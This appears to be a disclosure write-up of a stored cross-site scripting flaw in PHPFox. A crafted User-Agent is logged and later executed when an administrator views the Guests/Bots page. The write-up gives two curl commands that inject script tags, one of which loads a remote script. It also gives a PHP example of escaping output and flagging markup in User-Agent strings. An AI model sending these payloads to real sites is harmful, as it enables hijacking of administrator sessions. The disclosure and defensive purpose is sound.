PHPFox XSS ADMINCP
[+] Links
[+] CVE’s
[+] Description
The system stores every URL accessed in a database table; the relevant table is ‘phpfox_log_session’, described below:
[phpfox]
> desc phpfox_log_session;

The column that can be manipulated is:
-> user_agent (100)
All accesses recorded by the system, including bots and users browsing the web site, can be seen in:
AdminCP
TOOLS > Online > Guests/Bots
Output
| IP ADDRESS | User-Agent | …
Knowing this, the following requests were created to inject a script into the AdminCP through the User-Agent header:
$ curl -A "<script src='http://www.example.com/script.js'></script>" http://www.meusite.com.br/
OR
$ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/
When any user with administrative access opens
‘AdminCP’
TOOLS > Online > Guests/Bots
the script runs in the administrative area.
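To show where the defect sits and how it is fixed, here is an added PHP example (not PHPFox's own code) that renders the Guests/Bots table from a constructed row set: the vulnerable version echoes the stored user_agent value as raw HTML, the hardened version escapes every database value on output. The column name, the row layout and the looksLikeMarkup() check are assumptions for illustration.

```php
<?php
// Added example, not PHPFox code. Rows mimic SELECT ip_address, user_agent FROM phpfox_log_session.
// Constructed sample data: one crafted User-Agent as stored by the page's curl request, one ordinary bot.
$rows = [
    ['ip_address' => '203.0.113.7', 'user_agent' => '<script>alert(1);</script>'],
    ['ip_address' => '203.0.113.8', 'user_agent' => 'Mozilla/5.0 (compatible; Googlebot/2.1)'],
];

// Vulnerable: the stored header is interpolated as raw HTML, so the AdminCP page executes it.
function renderRowVulnerable(array $row): string
{
    return '<tr><td>' . $row['ip_address'] . '</td><td>' . $row['user_agent'] . '</td></tr>';
}

// Escape helper: every value that came from the database is treated as untrusted text.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened: the same row, with both cells escaped on output.
function renderRowSafe(array $row): string
{
    return '<tr><td>' . h($row['ip_address']) . '</td><td>' . h($row['user_agent']) . '</td></tr>';
}

// Detection aid (assumed, not a substitute for escaping): a User-Agent containing markup
// is not a legitimate client string and is worth flagging when the session row is written.
function looksLikeMarkup(string $ua): bool
{
    return preg_match('/<\s*\/?\s*[a-z]/i', $ua) === 1;
}

foreach ($rows as $row) {
    if (looksLikeMarkup($row['user_agent'])) {
        error_log('suspicious User-Agent stored from ' . $row['ip_address']);
    }
    echo renderRowSafe($row), "\n"; // renders &lt;script&gt;... as inert text
}
```

Escaping on output is the fix that closes the issue regardless of how the value reached the table; the markup check only adds a log signal.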